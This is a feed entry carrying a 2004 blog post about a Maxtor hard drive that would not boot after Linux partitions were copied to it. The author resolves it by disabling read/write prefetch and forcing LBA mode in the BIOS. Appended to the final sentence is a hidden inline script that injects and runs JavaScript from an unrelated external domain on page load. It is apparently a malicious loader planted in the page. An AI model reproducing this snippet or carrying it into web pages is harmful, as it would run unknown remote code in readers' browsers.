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		<title>Maxtor Diamond Star Boot Error on ST62K</title>
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		<pubDate>Mon, 11 Oct 2004 07:20:08 +0000</pubDate>
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		<description><![CDATA[I just received my new hard-drive, a Maxtor Diamonstar 90 &#8211; 8M (read 80Go and 8M of cache). So I decided to fdisk + cp -a my old distros to the new drive. Everything is ok .. I have something &#8230; <a href="http://www.larsen-b.com/Article/169.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>I just received my new hard-drive, a Maxtor Diamonstar 90 &#8211; 8M (read 80Go and 8M of cache). So I decided to fdisk + cp -a my old distros to the new drive. Everything is ok .. I have something like this:</p>
<pre class="literal-block">/dev/hda1  Win (I don't install this but leave a blank fat32 .. if)
/dev/hda2  Linux (my current debian)
/dev/hda3  BSD (NetBSD I think)
/dev/hda4  Data (10Go for what you wants)</pre>
<p>After I finish my cp -a /dev/hda2 /dev/hdc2, I just chroot to this and run grub-install. Ok .. that&#8217;s fine (no error message), it&#8217;s time to reboot.</p>
<p>Ouch! My new system doesn&#8217;t want to boot, I get a &#8216;SYSTEM BOOT FAILURE, INSERT BOOT DISK &#8230;&#8217; hum .. that&#8217;s sucks! Ok .. boot from a <a class="reference" href="http://www.sysresccd.org/">rescue CD</a> (which I really love after a day of issue on this HD), just chroot to my new drive install Lilo instead of grub .. =&gt; Crash .. oh god .. I tried it a several times and have random crash. After 2 hours, I discover that the HD have some issues with the <em>Prefetch Read/Write</em>, so I disable it.. Ok, no more random crash. Now I need to fix the boot error issue. I tested several things, and took me a lot of time and i discover something. In my bios  (I even made a new bios install), the default option is &#8216;auto detect&#8217; from the kind of HD: Large / LBA / CHS.. And this fucking HD is detected as a CHS, so I forced it to LBA, and now it works. In fact the OS doesn&#8217;t bios so it can read/write on the HD, but Lilo or Grub use the bios directly.</p>
<p>To resume Maxtor DiamonStar:</p>
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<li>Doesn&#8217;t support Read / Write prefetch</li>
<li>Do some bad thing w/ bios detection (I never seen this before ooo)</li>
<li>Are really quiet</li>
<li>Perform quite well: 56Mbs/sec in hdparm -t (far from my 110Mbs/ SCSI HD but..)</li>
<li>Are damn hot (really really hot !!)</li>
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<p>I destroy 2 Maxtor HD in a previous life, I hope this one will work a bit longer. Anyway, this is really the last time I buy this shit.<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
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